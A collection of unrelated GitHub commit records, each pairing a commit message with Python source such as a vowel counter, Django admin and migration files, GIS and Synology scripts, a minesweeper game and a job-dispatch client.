field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| Python | 0 | |
a635a8d58e46cf4ef1bc225f8824d73984971fee | Add the answer to the sixth question of Assignment 3 | countVowels.py | countVowels.py | """ Q6- Write a program that counts up the number of vowels contained in the string s. Valid vowels are: 'a', 'e', 'i',
'o', and 'u'. For example, if s = 'azcbobobegghakl', your program should print: Number of vowels: 5
"""
# Using the isVowel function from isVowel.py module (Answer of fifth question of Assignment 3)
def isVowel( char ):
# Converting the letter to lowercase for our convenience and hence, we do not need to check character's case and hence, simplifies the problem
# str.lower( char )
# The above function has been commented out since this is not required in this problem.. But, the above built-in function might be useful in normal cases.
# Splitting the condition: 'a' or 'e' or 'i' or 'o' or 'u' to make it more readable and easier to understand.
is_char_a = char == 'a'
is_char_e = char == 'e'
is_char_i = char == 'i'
is_char_o = char == 'o'
is_char_u = char == 'u'
is_char_vowel = is_char_a or is_char_e or is_char_i or is_char_o or is_char_u
return is_char_vowel
def countVowels( string ):
if str.islower( string ):
count = 0 # Counts the number of vowels
for letter in string:
if isVowel( letter ):
count += 1
print( "Number of vowels: " + str( count ) )
else:
if len( string ):
print( "Error: All the characters in the string should be in LOWERCASE." )
else:
print( "Error: The string is EMPTY." )
string = input( "Enter the string: " )
countVowels( string ) | Python | 0.999999 | |
58fabd7929a4c712f5e87a39aaf8c34bae8759b8 | Add photos to the admin | quickphotos/admin.py | quickphotos/admin.py | from django.contrib import admin
from .models import Photo
@admin.register(Photo)
class PhotoAdmin(admin.ModelAdmin):
list_display = ('user', 'caption', 'created')
list_filter = ('created',)
date_hierarchy = 'created'
readonly_fields = (
'photo_id', 'user', 'image', 'created', 'caption', 'link', 'like_count', 'comment_count')
fieldsets = (
(None, {
'fields': readonly_fields,
}),
)
def has_add_permission(self, request):
return False
| Python | 0 | |
f7035a6c328bb237dd3c9be5d9da805606e059ae | Create adjust_xml_impath.py | object_detection/adjust_xml_impath.py | object_detection/adjust_xml_impath.py | import os
import glob
import re
import argparse
ap = argparse.ArgumentParser()
ap.add_argument('-i', '--input_xml_dir', type=str, default='./annot', help='path to root dir of xmls')
ap.add_argument('-s', '--subfolder', type=str, default='images', help='name of image subfolder')
args = vars(ap.parse_args())
xmls = glob.glob(os.path.join(args['input_xml_dir'], '*xml'))
print('found %d xmls.' % len(xmls))
subfolder = args['subfolder'] if not args['subfolder'].endswith('/') else args['subfolder'][:-1]
print('image sub folder:', subfolder)
pattern1 = r'<filename>(.*?)</filename>'
pattern2 = r'<folder>.*?</folder>'
pattern3 = r'<path>.*?</path>'
for xml in xmls:
with open(xml, 'r') as fin:
s = fin.read()
filename = re.findall(pattern1, s)[0]
s = re.sub(pattern2, '<folder>%s</folder>' % args['subfolder'], s)
s = re.sub(pattern3, '<path>%s/%s/%s</path>' % (os.getcwd(), args['subfolder'], filename), s)
with open(xml, 'wb') as fout:
fout.write(s)
| Python | 0.000004 | |
0266a6cec641f244a8788f50f80ac3f11f87e1e4 | Add back fix_root script | scripts/fix_root.py | scripts/fix_root.py | import sys
import logging
from website.app import setup_django
setup_django()
from scripts import utils as script_utils
from osf.models import AbstractNode
from framework.database import paginated
logger = logging.getLogger(__name__)
def main(dry=True):
count = 0
for node in paginated(AbstractNode, increment=1000):
true_root = node.get_root()
if not node.root or node.root.id != true_root.id:
count += 1
logger.info('Setting root for node {} to {}'.format(node._id, true_root._id))
if not dry:
AbstractNode.objects.filter(id=node.id).update(root=true_root)
logger.info('Finished migrating {} nodes'.format(count))
if __name__ == '__main__':
dry = '--dry' in sys.argv
if not dry:
script_utils.add_file_logger(logger, __file__)
main(dry=dry)
| Python | 0.000001 | |
ecc15e50967f61e9e8ba8a96d4b8f6855c77b401 | Create geoprocess_exposure.py | hurricane/geoprocess_exposure.py | hurricane/geoprocess_exposure.py | import sys
import os
import datetime
import psycopg2
import pandas
from subprocess import call, Popen
conn_string = "dbname='hamlethurricane' user=postgres port='5432' host='127.0.0.1' password='password'"
os.system("exit")
os.system("exit")
print "Connecting to database..."
try:
conn = psycopg2.connect(conn_string)
except Exception as e:
print str(e)
sys.exit()
print "Connected!\n"
hurricane_name = 'ARTHUR'
dataframe_cur = conn.cursor()
dataframe_sql = """Select * from hurricane_{}""".format(hurricane_name)
dataframe_cur.execute(dataframe_sql)
data = dataframe_cur.fetchall()
colnames = [desc[0] for desc in dataframe_cur.description]
dataframe = pandas.DataFrame(data)
dataframe.columns = colnames
conn.commit()
range_feat = range(len(dataframe)-1)
range_feat_strp = str(range_feat).strip('[]')
range_feat_strp_v2 = range_feat_strp.split(',')
print range_feat_strp_v2
drop_if_sql = """drop table if exists hurricane_{}_parcels, exposed_parcels""".format(hurricane_name)
drop_if_cur = conn.cursor()
drop_if_cur.execute(drop_if_sql)
creation_cur = conn.cursor()
creation_sql = """create table hurricane_{}_parcels as
select * from dare_4326""".format(hurricane_name,hurricane_name)
creation_cur.execute(creation_sql)
conn.commit()
add_cur = conn.cursor()
add_sql = """alter table hurricane_{}_parcels
add column andrew_impact character varying(50),
add column iso_time character varying (19)
""".format(hurricane_name)
add_cur.execute(add_sql)
conn.commit()
buffer_cur = conn.cursor()
intersect_cur = conn.cursor()
for key in range(1,len(dataframe)-1):
sql = """create or replace view vw_parcels_impact_{} as
select a.nparno, b.iso_time, b.ogc_fid, a.geom as geom
from dare_4326 as a
inner join vw_rmw_{} as b
on st_intersects(b.geom,a.geom)
group by a.nparno, b.iso_time, b.ogc_fid, a.geom;""".format(key, key)
print sql
intersect_cur.execute(sql)
conn.commit()
update_cur = conn.cursor()
for key in range(1, len(dataframe)-1):
sql = """update hurricane_{}_parcels as a
set iso_time = b.iso_time
from vw_parcels_impact_{} as b
where a.nparno = b.nparno""".format(hurricane_name, key)
print sql
update_cur.execute(sql)
conn.commit()
exposed_cur = conn.cursor()
exposed_sql = """create table exposed_parcels as
select * from hurricane_{}_parcels where iso_time is not null""".format(hurricane_name, hurricane_name)
exposed_cur.execute(exposed_sql)
exposed_cur = conn.cursor()
conn.commit()
| Python | 0.000001 | |
8578320e023dc3424da055c4a506931ec44b19ce | Save user's name to db when verifying AGA id | web/app/verify/views.py | web/app/verify/views.py | from . import verify
from .aga_membership import get_aga_info
from flask import abort, redirect, url_for, render_template, current_app
from flask.ext.security import login_required
from flask.ext.login import current_user
from flask.ext.wtf import Form
from flask.ext.mail import Message
from sqlalchemy.sql import and_
from itsdangerous import BadSignature, URLSafeSerializer
from app.models import User, db
from wtforms import IntegerField, SubmitField
from wtforms.validators import Required
def get_serializer(secret_key=None):
if secret_key is None:
secret_key = current_app.config['SECRET_KEY']
return URLSafeSerializer(secret_key)
@verify.route('/verify/<payload>')
@login_required
def verify_player(payload):
s = get_serializer()
try:
user_id, aga_id = s.loads(payload)
except BadSignature:
current_app.logger.info('Verify called with invalid paylod')
abort(404)
if user_id != current_user.id:
current_app.logger.warn("Verify called for id %s, but wrong user answered, %s" % (user_id, current_user))
abort(404)
aga_info = get_aga_info(aga_id)
if aga_info is None:
current_app.logger.warn("Could not fetch AGA info for aga_id %s" % aga_id)
abort(404)
user_realname = aga_info.get('full_name', '')
# TODO: Fetch the fake user account with this aga_id, take its AGA player
# and reassign it to the real user
user = User.query.get_or_404(user_id)
user.aga_id = aga_id
user.name = user_realname
db.session.add(user)
db.session.commit()
msg = 'Linked account with AGA #%s' % user.aga_id
current_app.logger.info(msg)
return redirect(url_for('ratings.profile'))
def get_verify_link(user, aga_id):
s = get_serializer()
payload = s.dumps([user.id, aga_id])
return url_for('.verify_player', payload=payload,
_external=True)
def aga_id_already_used(user, aga_id):
exists = User.query.filter(and_(User.id!=user.id, User.aga_id==str(aga_id), User.fake==False)).count() > 0
return exists
def send_verify_email(user, aga_id):
aga_info = get_aga_info(aga_id)
if aga_info is None:
return False
email_address = aga_info['email']
email_subject = "Confirm AGA ID for Online Ratings"
email_body = render_template('verify/verification_email.html',
user=user, aga_id=aga_id, verify_link=get_verify_link(user, aga_id))
email = Message(
recipients=[email_address],
subject=email_subject,
html=email_body,
)
current_app.extensions.get('mail').send(email)
return True
@verify.route('/verify', methods=['GET', 'POST'])
@login_required
def verify_form():
form = LinkUserWithAGANumberForm()
if form.validate_on_submit():
aga_id = form.aga_id.data
if aga_id_already_used(current_user, aga_id):
return render_template('verify/verify_form_post_submit_conflict.html', aga_id=aga_id)
success = send_verify_email(current_user, aga_id)
if success:
return render_template('verify/verify_form_post_submit.html')
else:
return render_template('verify/verify_form_post_submit_error.html', aga_id=aga_id)
return render_template('verify/verifyform.html', form=form)
class LinkUserWithAGANumberForm(Form):
aga_id = IntegerField('Aga number?',
validators=[Required()])
submit = SubmitField()
| from . import verify
from .aga_membership import get_aga_info
from flask import abort, redirect, url_for, render_template, current_app
from flask.ext.security import login_required
from flask.ext.login import current_user
from flask.ext.wtf import Form
from flask.ext.mail import Message
from sqlalchemy.sql import and_
from itsdangerous import BadSignature, URLSafeSerializer
from app.models import User, db
from wtforms import IntegerField, SubmitField
from wtforms.validators import Required
def get_serializer(secret_key=None):
if secret_key is None:
secret_key = current_app.config['SECRET_KEY']
return URLSafeSerializer(secret_key)
@verify.route('/verify/<payload>')
@login_required
def verify_player(payload):
s = get_serializer()
try:
user_id, aga_id = s.loads(payload)
except BadSignature:
current_app.logger.info('Verify called with invalid paylod')
abort(404)
if user_id != current_user.id:
current_app.logger.warn("Verify called for id %s, but wrong user answered, %s" % (user_id, current_user))
abort(404)
# TODO: Fetch the fake user account with this aga_id, take its AGA player
# and reassign it to the real user
user = User.query.get_or_404(user_id)
user.aga_id = aga_id
db.session.add(user)
db.session.commit()
msg = 'Linked account with AGA #%s' % user.aga_id
current_app.logger.info(msg)
return redirect(url_for('ratings.profile'))
def get_verify_link(user, aga_id):
s = get_serializer()
payload = s.dumps([user.id, aga_id])
return url_for('.verify_player', payload=payload,
_external=True)
def aga_id_already_used(user, aga_id):
exists = User.query.filter(and_(User.id!=user.id, User.aga_id==str(aga_id), User.fake==False)).count() > 0
return exists
def send_verify_email(user, aga_id):
aga_info = get_aga_info(aga_id)
if aga_info is None:
return False
email_address = aga_info['email']
email_subject = "Confirm AGA ID for Online Ratings"
email_body = render_template('verify/verification_email.html',
user=user, aga_id=aga_id, verify_link=get_verify_link(user, aga_id))
email = Message(
recipients=[email_address],
subject=email_subject,
html=email_body,
)
current_app.extensions.get('mail').send(email)
return True
@verify.route('/verify', methods=['GET', 'POST'])
@login_required
def verify_form():
form = LinkUserWithAGANumberForm()
if form.validate_on_submit():
aga_id = form.aga_id.data
if aga_id_already_used(current_user, aga_id):
return render_template('verify/verify_form_post_submit_conflict.html', aga_id=aga_id)
success = send_verify_email(current_user, aga_id)
if success:
return render_template('verify/verify_form_post_submit.html')
else:
return render_template('verify/verify_form_post_submit_error.html', aga_id=aga_id)
return render_template('verify/verifyform.html', form=form)
class LinkUserWithAGANumberForm(Form):
aga_id = IntegerField('Aga number?',
validators=[Required()])
submit = SubmitField()
| Python | 0 |
ac3a3b583b028e53d80749eaaee58b4eb80d1c6a | Implement stack functionality | stack/stack.py | stack/stack.py |
class Node(object):
def __init__(self, value=None, next_node=None):
self.value = value
self.next_node = next_node
class Stack(object):
def __init__(self, head=None):
self.head = head
def push(self, data):
self.head = Node(data, self.head)
def pop(self):
if self.head:
retval = self.head.value
self.head = self.head.next_node
return retval
raise LookupError
def write_output(self):
output = ''
count = 1
while self.head:
if count % 2 != 0:
output += str(self.pop()) + ' '
else:
self.pop()
count += 1
return output.rstrip()
| Python | 0.000002 | |
a6137714c55ada55571759b851e1e4afa7818f29 | Add cli tool to delete documents. | app/utils/scripts/delete-docs.py | app/utils/scripts/delete-docs.py | #!/usr/bin/python
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Basic command line script to delete documents."""
import argparse
import sys
import models
import utils
import utils.db
COLLECTIONS = [
models.BOOT_COLLECTION,
models.DEFCONFIG_COLLECTION,
models.JOB_COLLECTION,
models.LAB_COLLECTION
]
ALL_COLLECTIONS = [
"all"
]
ALL_COLLECTIONS.extend(COLLECTIONS)
def parse_fields(fields):
for field in fields:
if "=" in field:
yield field.split("=", 1)
else:
utils.LOG.error("Field %s is not valid, not considered", field)
def _delete_with_spec(collection, spec_or_id, database):
ret_val = None
if collection == "all":
utils.LOG.info("Deleting documents in all collections")
for coll in COLLECTIONS:
utils.LOG.info("Deleting from %s...", coll)
ret_val = utils.db.delete(database[coll], spec)
else:
ret_val = utils.db.delete(database[collection], spec_or_id)
if ret_val == 200:
utils.LOG.info("Documents identified deleted: %s", spec_or_id)
else:
utils.LOG.error(
"Error deleting documents with the provided values: %s",
spec_or_id)
sys.exit(1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Import boots from disk",
version=0.1
)
parser.add_argument(
"--collection", "-c",
type=str,
help="The name of the job to import",
dest="collection",
required=True,
choices=ALL_COLLECTIONS
)
parser.add_argument(
"--field", "-f",
help=(
"The necessary fields to identify the elements to delete; "
"they must be defined as key=value pairs"
),
dest="fields",
action="append",
required=True
)
args = parser.parse_args()
collection = args.collection
fields = args.fields
spec = {
k: v for k, v in parse_fields(fields)
}
if spec:
database = utils.db.get_db_connection({})
_delete_with_spec(collection, spec, database)
else:
utils.LOG.error("Don't know what to look for...")
sys.exit(1)
| Python | 0.000013 | |
c71a3f1adbf310c63ce9ab7611cf0e198ffe69da | Add load test | metakernel/magics/tests/test_load_magic.py | metakernel/magics/tests/test_load_magic.py |
from metakernel.tests.utils import get_kernel
def test_load_magic():
kernel = get_kernel()
ret = kernel.do_execute("%%load %s" % __file__)
assert 'def test_load_magic' in ret['payload'][0]['text']
| Python | 0.000001 | |
e575f343f55fd54994fdb1f4d02fe6e2e52ba056 | add phonetizer.py - really | phonetizer.py | phonetizer.py | import re
class Phonetizer():
# Define shorthands for phonological classes
ph_classes = {
'C' : 'p|t|k|b|d|g',
'V' : 'a|e|i|o|u|y'
}
def __init__(self, mappings_filename):
with open(mappings_filename) as mfile:
self.read_mfile(mfile)
def read_mfile(self, mfile):
"""
"""
self.ortho_maps = []
self.phone_maps = []
for line in mfile:
sline = line[:-1].split('\t') # fix this using csv so the user doesn't have to have an extra blank line!
if len(sline) == 2:
self.ortho_maps.append((sline[0],sline[1]))
elif len(sline) == 3:
self.phone_maps.append((sline[0],sline[1]))
self.ortho_maps.sort(key=lambda x: len(x[0]))
self.ortho_maps.reverse()
def read_wfile(self, ttfilename):
with open(ttfilename) as ttfile:
return [(line[:-1].split('\t')[0],line[:-1].split('\t')[1]) for line in ttfile]
def run_tests(self, ttfilename):
cases = self.read_wfile(ttfilename)
for c in cases:
transcription = self.phonetize(c[0])
if transcription != c[1]:
print('Output [{}] should have been [{}].'.format(transcription, c[1]))
def phonetize(self, ortho):
result = ['' for character in ortho]
# go from ortho to initial transcription
for om in self.ortho_maps:
hits = re.finditer(om[0], ortho)
for hit in hits:
result[hit.start()] = om[1]
ortho = ''.join(['*' if i in range(hit.start(), hit.end()) else c for i,c in enumerate(ortho)])
for i,character in enumerate(ortho):
if character != '*':
result[i] = character
result = ''.join(result)
# apply "phonology"
loop_input_str = ''.join(result)
new_result = ['' for character in result]
while True:
loop_input = loop_input_str
new_result = [c for c in loop_input_str]
for pm in self.phone_maps:
hits = re.finditer(pm[0], loop_input_str)
for hit in hits:
new_result[hit.start()] = pm[1]
for i in range(hit.start()+1, hit.end()):
new_result[i] = ''
loop_input = ''.join(['*' if i in range(hit.start(), hit.end()) else c for i,c in enumerate(loop_input)])
if ''.join(new_result) == loop_input_str:
return loop_input_str
else:
loop_input_str = ''.join(new_result)
#### Quick, temp lines for testing
p = Phonetizer('test_mappings.txt')
p.run_tests('test_ortho.txt') | Python | 0 | |
91a23d6a946f70b4750e9141fb71e0bd3b7c2705 | Rename the main file to minesweeper.py | minesweeper.py | minesweeper.py | import pygame
import random
from constants import *
def initialize():
# Do initial window and pygame management
pygame.init()
pygame.display.set_caption("Minesweeper PRE-ALPHA")
def get_screen():
# create and return the screen
size = (SCREEN_HEIGHT, SCREEN_WIDTH)
screen = pygame.display.set_mode(size)
return screen
def generate_mines():
mine_grid = [[0 for x in range(COLUMNS)] for y in range(ROWS)]
total_mines = 0
for rows in range(ROWS):
while total_mines < MINES:
row = random.randrange(0, ROWS)
column = random.randrange(0, COLUMNS)
if mine_grid[row][column] == 0:
mine_grid[row][column] = 1
total_mines += 1
return mine_grid
def reveal_neighbors(row, column, clicked_grid):
left = row >= 1
right = row < ROWS - 1
up = column >= 1
down = column < COLUMNS - 1
if right:
clicked_grid[row + 1][column] = 1
if up:
clicked_grid[row][column - 1] = 1
if down:
clicked_grid[row][column + 1] = 1
if left:
clicked_grid[row - 1][column] = 1
def get_block_color(row, column, clicked_grid):
mine_count = count_mine_neighbors(row, column, mine_grid)
if clicked_grid[row][column] == 0:
grid_color = WHITE
elif mine_grid[row][column] == 1:
grid_color = RED
elif mine_count == 0:
grid_color = BLUE
reveal_neighbors(row, column, clicked_grid)
elif mine_count == 1:
grid_color = CYAN
elif mine_count == 2:
grid_color = DARKGREEN
elif mine_count == 3:
grid_color = GREEN
elif mine_count == 4:
grid_color = LITEGREEN
elif mine_count == 5:
grid_color = PURPLE
elif mine_count == 6:
grid_color = PINK
elif mine_count == 7:
grid_color = YELLOW
elif mine_count == 8:
grid_color = ORANGE
return grid_color
def draw_grid(clicked_grid, mine_grid, screen):
for column in range(0, COLUMNS):
for row in range(0, ROWS):
block_color = get_block_color(row, column, clicked_grid)
pygame.draw.rect(screen, block_color,
(column * GRID_WIDTH + (column + 1) * MARGIN,
row * GRID_HEIGHT + (row + 1) * MARGIN,
GRID_WIDTH,
GRID_HEIGHT))
def main_loop():
done = False
while not done:
for event in pygame.event.get(): # User did something
if event.type == pygame.QUIT: # If user clicked close
done = True # Flag that we are done so we exit this loop
if event.type == pygame.MOUSEBUTTONDOWN:
Controls.mouse_down(clicked_grid)
draw_grid(clicked_grid, mine_grid, screen)
# Update the screen with what is drawn.
pygame.display.flip()
clock.tick(60)
def count_mine_neighbors(row, column, mine_grid):
mine_neighbor_count = 0
# make sure
left = row >= 1
right = row < ROWS - 1
up = column >= 1
down = column < COLUMNS - 1
# check left, up-left, and down-left
if left:
if mine_grid[row - 1][column] == 1:
mine_neighbor_count += 1
if up and mine_grid[row - 1][column - 1] == 1:
mine_neighbor_count += 1
if down and mine_grid[row - 1][column + 1] == 1:
mine_neighbor_count += 1
# check right, up-right, and down-right
if right:
if mine_grid[row + 1][column] == 1:
mine_neighbor_count += 1
if up and mine_grid[row + 1][column - 1] == 1:
mine_neighbor_count += 1
if down and mine_grid[row + 1][column + 1] == 1:
mine_neighbor_count += 1
# check up and down
if up and mine_grid[row][column - 1] == 1:
mine_neighbor_count += 1
if down and mine_grid[row][column + 1] == 1:
mine_neighbor_count += 1
return mine_neighbor_count
class Controls:
def mouse_down(clicked_grid):
pos = pygame.mouse.get_pos()
col_clicked = pos[0] // (GRID_WIDTH + MARGIN)
row_clicked = pos[1] // (GRID_HEIGHT + MARGIN)
if row_clicked >= ROWS:
row_clicked = ROWS - 1
if col_clicked >= COLUMNS:
col_clicked = COLUMNS - 1
clicked_grid[row_clicked][col_clicked] = 1
if __name__ == "__main__":
initialize()
# Used to manage how fast the screen updates
clock = pygame.time.Clock()
screen = get_screen()
# Holds rows that have been clicked
clicked_grid = [[0 for x in range(COLUMNS)] for y in range(ROWS)]
# Holds location of the mines
mine_grid = generate_mines()
# Loop until the user clicks the close button.
done = False
main_loop()
# Clean up
pygame.quit()
| Python | 0.000316 | |
163da52a48eb0d84cde47f7cfe99e1188350db47 | Add MOBIB Basic reader script | mobib_basic.py | mobib_basic.py | #!/bin/env python3
import sys
from smartcard.System import readers
CALYPSO_CLA = [0x94]
SELECT_INS = [0xA4]
READ_RECORD_INS = [0xB2]
GET_RESPONSE_INS = [0xC0]
TICKETING_COUNTERS_FILE_ID = [0x20, 0x69]
def main():
local_readers = readers()
if local_readers:
if len(local_readers) == 1:
readerIndex = 0
else:
for i, reader in enumerate(local_readers):
print("[{}]: {}".format(i, reader))
readerIndex = int(input("Select a reader: "))
else:
print("No reader detected")
sys.exit(1)
calypso = local_readers[readerIndex].createConnection()
calypso.connect()
select_apdu = CALYPSO_CLA + SELECT_INS + [0x00, 0x00, 0x02] + TICKETING_COUNTERS_FILE_ID + [0x00]
data, sw1, sw2 = calypso.transmit(select_apdu)
if sw1 == 0x61:
get_response_apdu = [0x00] + GET_RESPONSE_INS + [0x00, 0x00, sw2]
data, sw1, sw2 = calypso.transmit(get_repsonse_apdu)
read_record_apdu = CALYPSO_CLA + READ_RECORD_INS + [0x01, 0x04, 0x1D]
data, sw1, sw2 = calypso.transmit(read_record_apdu)
if sw1 == 0x90:
# FIXME: each chunk of remaining trips stored on 3 bytes?
#chunks = [data[x:x+3] for x in range(0, len(data), 3)]
#total = 0
#for chunk in chunks:
# total += chunk[2]
#print("Number of remaining trips: {}".format(tot = chunks[i][2] for i in chunks))
print("Number of remaining trips: {}".format(sum(data)))
else:
print("Error getting number of remaining trips")
sys.exit(2)
if __name__ == '__main__':
main()
| Python | 0 | |
97531bdb1501748c7039d194e98408245dc5d2b2 | Make graphflow loading script | load-tx-to-graphflow.py | load-tx-to-graphflow.py | from constants import *
import csv
walletsMap={} #address -> number OR transaction_id->number
lastNumber = 0
with open(IN_TRANSACTION_CSV_LOCATION, 'rb') as tx_in_file:
in_reader = csv.reader(tx_in_file, delimiter=",")
for row in in_reader:
tx_hash = row[0]
wallet_addr = row[1]
tx_amt = row[2]
if wallet_addr in walletsMap:
wallet_id = walletsMap[wallet_addr]
else:
wallet_id = lastNumber
walletsMap[wallet_addr] = wallet_id
lastNumber+=1
if tx_hash in walletsMap:
tx_id = walletsMap[tx_hash]
else:
tx_id = lastNumber
walletsMap[tx_hash] = tx_id
lastNumber+=1
print("CREATE ("+str(wallet_id)+":wallet {address: {"+wallet_addr+"}}) -[:SENT {satoshi: {"+str(tx_amt)+"}}] -> ("+str(tx_id)+":tx {hash:"+tx_hash+"})")
with open(OUT_TRANSACTION_CSV_LOCATION, 'rb') as tx_out_file:
out_reader = csv.reader(tx_out_file, delimiter=",")
for row in out_reader:
tx_hash = row[0]
wallet_addr = row[1]
tx_amt = row[2]
if wallet_addr in walletsMap:
wallet_id = walletsMap[wallet_addr]
else:
wallet_id = lastNumber
walletsMap[wallet_addr] = wallet_id
lastNumber+=1
if tx_hash in walletsMap:
tx_id = walletsMap[tx_hash]
else:
tx_id = lastNumber
walletsMap[tx_hash] = tx_id
lastNumber+=1
print("CREATE ("+str(wallet_id)+":wallet {address: {"+wallet_addr+"}}) -[:RECEIVED {satoshi: {"+str(tx_amt)+"}}] -> ("+str(tx_id)+":tx {hash:"+tx_hash+"})")
| Python | 0.000002 | |
7f6aab7dc177dc1178eca30e0ba40874b217e7cf | Create *variable.py | *variable.py | *variable.py | def num(*nums): // One * takes in any number of single data type, in this case : Int
sum = 0
for x in nums:
sum += x
return sum
sum(22,33,44,55,66) // You can type as many numbers as you wish
def whatever(**kwargs): // Double ** take more than just a type of data, in this case, there is Str and Int
print(first_name)
print(last_name)
print(age)
whatever('first_name': 'John', 'last_name': 'Lee', 'age': 22) // Create a dictionary
| Python | 0.000001 | |
70da5f3657ee847f315b0d0dfbe5adb393c55ca6 | add system_info.py | system_info.py | system_info.py | # -*- coding: utf-8 -*-
"""System info"""
import platform
import subprocess
import sys
import numpy
class SystemInfo:
"""Collect system info."""
@property
def platform(self):
"""Info on the underlying platform."""
return platform.platform()
@property
def architecture(self):
"""System architecture."""
is_64bits = sys.maxsize > 2**32
arch = '64bits' if is_64bits else '32bits'
return arch
@property
def python(self):
"""Python version."""
return sys.version
@property
def numpy(self):
"""Numpy version."""
return numpy.__version__
@property
def gfortran(self):
"""gfortran version."""
return subprocess.run(['gfortran', '-v'],
stderr=subprocess.PIPE).stderr.decode()
@classmethod
def attrs(cls):
"""Available system infos."""
return [p for p in dir(cls) if isinstance(getattr(cls, p), property)]
def __repr__(self):
fmt = '\n'.join(['%s'] * 3 + ['\n'])
return ''.join(
[fmt % (a, '=' * len(a), getattr(self, a)) for a in self.attrs()])
if __name__ == '__main__':
# print out system info
print(SystemInfo())
| Python | 0.000002 | |
2910f54c75e3f7cc9d7be08886547060a7e69b69 | Implement basic CLI control | pusher.py | pusher.py | from __future__ import print_function, absolute_import, unicode_literals, division
from stackable.stack import Stack
from stackable.utils import StackablePickler
from stackable.network import StackableSocket, StackablePacketAssembler
from stackable.stackable import StackableError
from runnable.network import RunnableServer, RequestObject
from subprocess import Popen, PIPE
from threading import Thread, Lock
from sys import argv
class DispatchPusher(object):
def __init__(self, ip=None, port=None):
self.stack = None
if ip != None and port != None:
self.connect(ip, port)
def connect(self, ip, port):
self.stack = Stack((StackableSocket(ip=ip, port=port),
StackablePacketAssembler(),
StackablePickler()))
def push_module(self, name, module):
self.stack.write({'cmd': 'module', 'args': {'name': name, 'module': module}})
def dispatch(self, dispatcher, module):
self.stack.write({'cmd': 'dispatch', 'args': {'dispatcher': dispatcher, 'module': module}})
def status(self, dispatcher, job):
self.stack.write({'req': 'status', 'args': {'dispatcher': dispatcher, 'id': job}})
def close(self):
self.stack.close()
def monitor(self):
while True:
o = self.stack.read()
print(o)
dp = DispatchPusher(argv[1], int(argv[2]))
a = Thread(target=dp.monitor)
a.daemon = True
a.start()
mode = 'file'
while True:
x = raw_input('[%s] ' % mode)
if x == '':
continue
if x[:2] == '!!':
mode = x[2:]
print(' --> Changing mode to %s' % mode)
continue
if mode == 'file':
name = x.rpartition('/')[2].partition('.py')[0]
f = b''
try:
f = open(x).read()
except:
print(' --> Failed to read %s' % name)
code = compile(f, name, mode='exec', dont_inherit=True)
print(' --> Prepared %s' % name)
dp.push_module(name, code)
elif mode == 'dispatch':
x = x.partition(' ')
print(' --> Dispatching', x[2], 'to', x[0])
dp.dispatch(x[0], x[2])
elif mode == 'console':
if x == 'close':
dp.close()
raise KeyboardInterrupt()
print("[PUSHER] Ready")
| Python | 0.000001 | |
e10ed243f6cae2e020d468bbd13a619e45ed0c5d | Add a forgotten migration | sponsors/migrations/0011_auto_20170629_1208.py | sponsors/migrations/0011_auto_20170629_1208.py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-29 10:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sponsors', '0010_auto_20170627_2001'),
]
operations = [
migrations.AlterField(
model_name='sponsor',
name='type',
field=models.CharField(choices=[('diamond', 'Diamond Sponsor'), ('lanyard', 'Lanyard Sponsor'), ('track', 'Track Sponsor'), ('foodanddrinks', 'Food & Drinks Sponsor'), ('standard', 'Standard Sponsor'), ('supporter', 'Supporter Sponsor'), ('mainmedia', 'Main Media Sponsor'), ('media', 'Media sponsors')], default='standard', max_length=255),
),
]
| Python | 0.000029 | |
ca5d47f3749c188d0858e996ba0253077260cd6c | Create GetUserGraphInstagram.py | GetUserGraphInstagram.py | GetUserGraphInstagram.py | #! /bin/bash
for (( i=1; i <= 5; i++ ))
do
userid=$i
curl https://api.instagram.com/v1/users/$userid/follows?access_token=XXXXXX > followers/$userid.followers
curl https://api.instagram.com/v1/users/$userid/followed-by?access_token=XXXXXX > followedby/$userid.followedby
done
| Python | 0 | |
a8f4f0aa06e1469e758d5775bfea4176c7561e9f | Create stop_playlist.py | HA/syno/stop_playlist.py | HA/syno/stop_playlist.py | #!/usr/bin/python
import sys
import http.cookiejar, urllib.request, urllib.error, urllib.parse
import json
import codecs
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
IP_syno = "IP_OF_YOUR_NAS"
LOGIN = "********"
PASSWORD = "********"
player = sys.argv[1]
opener.addheaders = [
('User-Agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11'),
]
#URL to send requests to Synology
urlAuth = "http://" + IP_syno + ":5000/webapi/auth.cgi?api=SYNO.API.Auth&version=2&method=login&account=" + LOGIN + "&passwd=" \
+ PASSWORD + "&session=AudioStation&format=cookie"
urlPlayers = "http://" + IP_syno + ":5000/webapi/AudioStation/remote_player.cgi?api=SYNO.AudioStation.RemotePlayer&version=1&method=list"
opener.open(urlAuth)
#Get Players list as JSON
pagePlayers = opener.open(urlPlayers)
strPlayers = codecs.getreader(pagePlayers.headers.get_content_charset())
jsonPlayers = json.load(strPlayers(pagePlayers))['data']['players']
#print(jsonPlayers)
#Get Player ID required to send http command to play content on the chosen player on Synology
for d in jsonPlayers:
PlayerName = d['name']
if PlayerName == player:
PlayerID = d['id']
urlStop = "http://" + IP_syno + ":5000/webapi/AudioStation/remote_player.cgi?api=SYNO.AudioStation.RemotePlayer&method=control&action=stop&id=" + PlayerID + "&version=$
#print(urlStop)
opener.open(urlStop)
| Python | 0.000008 | |
b6daa366a38f224132c8f276d3fbc212964900c2 | add currency | zametki/currency.py | zametki/currency.py | import requests as req
def getUSD_RUB():
currency_url = 'http://api.fixer.io/latest?symbols=RUB&base=USD'
res = req.get(currency_url).json()
return res['rates']['RUB']
#print(getUSD_RUB())
| Python | 0.999995 | |
